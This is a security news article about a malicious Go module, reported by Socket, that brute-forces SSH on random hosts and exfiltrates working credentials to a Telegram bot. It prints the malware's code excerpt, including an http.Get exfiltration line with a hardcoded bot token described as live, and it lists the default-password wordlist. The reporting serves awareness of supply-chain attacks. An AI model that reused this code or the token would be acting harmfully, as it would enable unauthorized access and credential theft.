Go module for brute force attacks on SSH steals the accesses found

A Go module discovered by the security company Socket carries out random attacks on SSH ports, but reports success not only to the current user, but also to the author of the tool via Telegram. Because the Telegram API uses HTTPS, it deceives security systems as the bot traffic is ordinary web requests.

The malicious Go module is called golang-random-ip-ssh-bruteforce and can be traced back to a cyber attacker who can be found on GitHub and in the Go module ecosystem under the name IllDieAnyway. In addition to the Go malware, his GitHub page hosted other tools such as a port scanner and a brute forcer for the database tool phpMyAdmin, also with a backdoor. In the meantime, the IllDieAnyway websites on GitHub and Go modules are no longer available.

The malicious code in detail

golang-random-ip-ssh-bruteforce continuously generates random IPv4 addresses and scans TCP port 22 in parallel for unprotected SSH services. It uses HostKeyCallback: ssh.InsecureIgnoreHostKey() to bypass server-side identity checks. In the event of a hit, the malware attempts to perform authentication with a simple, local user name/password list. After a successful login, golang-random-ip-ssh-bruteforce transmits the IP address of the computer and the access data to a Telegram bot hardcoded in the source code and reports the success to the user. It then terminates itself in order to remain as hidden as possible from the point of attack.

Socket has published an excerpt of the code and commented on it:

// Probe the host on TCP 22. If the port is reachable, launch brute forcing.
func IsOpened(host string) {
    target := fmt.Sprintf("%s:%d", host, 22)
    conn, err := net.DialTimeout("tcp", target, 2*time.Second)
    if err == nil && conn != nil {
        conn.Close()
        go brute(host)
    }
}

// Configure SSH to skip host key verification, then attempt user:pass.
sshConfig := &ssh.ClientConfig{
    User: user,
    Auth: []ssh.AuthMethod{ssh.Password(pass)},
    Timeout: time.Duration(timeout) * time.Second,
    HostKeyCallback: ssh.InsecureIgnoreHostKey(), // Skip server verification.
}
client, err := ssh.Dial("tcp", addr, sshConfig)

// On first success, send stolen credentials to the threat actor's Telegram.
data := addr + ":" + user + ":" + pass + "</code>"
http.Get("https://api[.]telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884&parse_mode=HTML&text=<code>" + data)
close(succ) // Signal success and exit.

After successful transmission of the tapped data, the Telegram API responds with "ok": true for a valid message_id for the chat 1159678884. The hardcoded exit point is:

https://api.telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884

According to Socket.dev, the bot token 5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY is currently still live. Telegram identifies the bot as ssh_bot with the username @sshZXC_bot. The target chat 1159678884 is a private chat with @io_ping (aka Gett). If the bot token and chat are active, the Go malware sends the data of every first successful login in the format ip:user:pass via @sshZXC_bot to @io_ping.

Traveling inconspicuously with an offline word list

The malicious Go module contains a short, static word list and receives neither updates nor access data via the network, so it runs silently until the first hit. The word list combines only two usernames – root and admin – with weak and default passwords, for example toor, raspberry, dietpi, alpine, password, qwerty, numeric sequences and role terms such as webadmin, webmaster, maintenance, techsupport, marketing or uploader.

Socket generally warns against supply chain attacks when using modules in your own code. Users should always check these carefully, for example for hard-coded remote stations in the network – often with Telegram.

(who)